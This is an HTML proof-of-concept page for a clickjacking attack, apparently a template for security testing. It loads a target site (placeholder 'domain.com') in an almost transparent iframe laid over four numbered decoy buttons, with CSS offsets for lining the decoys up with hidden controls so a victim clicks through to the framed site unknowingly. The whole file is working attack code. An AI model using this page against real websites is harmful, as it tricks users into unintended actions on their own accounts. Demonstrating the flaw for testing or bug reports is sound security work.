<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clickjacking POC</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
        }
        iframe {
            position: relative;
            width: 100%;
            height: 100%;
            opacity: 0.1;
            z-index: 2;
            border: none;
        }
        .firstClick, .secondClick, .thirdClick, .fourthClick {
            position: absolute;
            z-index: 1;
            background: white;
            padding: 10px;
            border: 1px solid black;
            border-radius: 5px;
        }
        .firstClick {
            top: 28px; /* Adjust as needed to move up */
            right: 15px; /* Adjust as needed to move right */
        }
	 .secondClick {
            top: 120px; /* Adjust as needed to move up */
            right: 60px; /* Adjust as needed to move right */
        }
        .thirdClick {
            top: 53%;
            left: 8%;
 
        }
        .fourthClick {
            top: calc(50% + 100px); /* Adjust as needed */
            left: 30%;
            top: calc(50% + 100px);
        }
    </style>
</head>
<body>
    <div class="firstClick">first Click</div>
    <div class="secondClick">Click me second</div>
    <div class="thirdClick">Click me third</div>
    <div class="fourthClick">Click me last</div>
    <iframe src="domain.com"></iframe>
</body>
</html>
